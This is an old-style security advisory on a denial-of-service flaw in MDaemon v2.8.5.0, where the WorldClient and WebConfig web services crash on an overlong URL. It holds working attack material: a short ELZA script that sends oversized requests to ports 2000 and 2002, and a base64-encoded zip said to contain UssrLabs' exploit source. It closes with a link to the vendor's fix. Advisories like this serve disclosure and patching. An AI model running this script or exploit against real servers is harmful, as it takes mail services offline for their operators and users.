COMMAND
MDaemon
SYSTEMS AFFECTED
MDaemon v2.8.5.0
PROBLEM
UssrLabs found multiple places in MDaemon v2.8.5.0 where they do
not use proper bounds checking. The following all result in a
Denial of Service against the service in question. Affected
services:
WorldClient: Port 2000
WebConfig: Port 2002
This two remotes services are affected to overflow of you send a
large url name. Like:
http:/serverip/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
For the Binary / Source for this MDaemon Server v2.8.5.0 Denial
of Service go to:
http://www.ussrback.com/mdeam285/
Philip Stoev added following. Recently, it occured to him that
it is by no means necessary to compile a binary for every such
DoS, even if it can not be performed with telnet or netcat. So,
he wrote a script language for automating HTTP requests. The
interpreter can be obtained from
http://phiphi.hypermart.net
This DoS would look like this written in ELZA:
var onerror = continue
subst SERVER ? 127.0.0.1
subst BIGURL > 1000
get url http://SERVER:2000/BIGURL
get url http://SERVER:2002/BIGURL
Below is source code exploit by UssrLabs (mimed):
---
Content-Type: application/octet-stream; name="mdeam285.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="mdeam285.zip"
Content-MD5: g5MAOospqpvsPxpYSTO65A==
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
AAADAAMAoAAAALwGAAAAAA==
-----
SOLUTION
A fix for all MDaemon/WorldClient Standard customers is available
here:
http://www.altn.com/Downloads/incoming/md285fix.zip